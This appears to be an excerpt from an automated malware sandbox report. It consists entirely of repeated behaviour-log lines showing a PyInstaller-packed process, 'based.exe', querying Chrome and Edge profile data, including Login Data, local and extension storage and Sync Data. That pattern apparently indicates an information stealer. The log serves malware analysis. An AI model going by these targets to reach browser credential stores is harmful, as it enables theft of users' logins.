Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gW7E6kPh5L.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\gW7E6kPh5L.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation	Jump to behavior
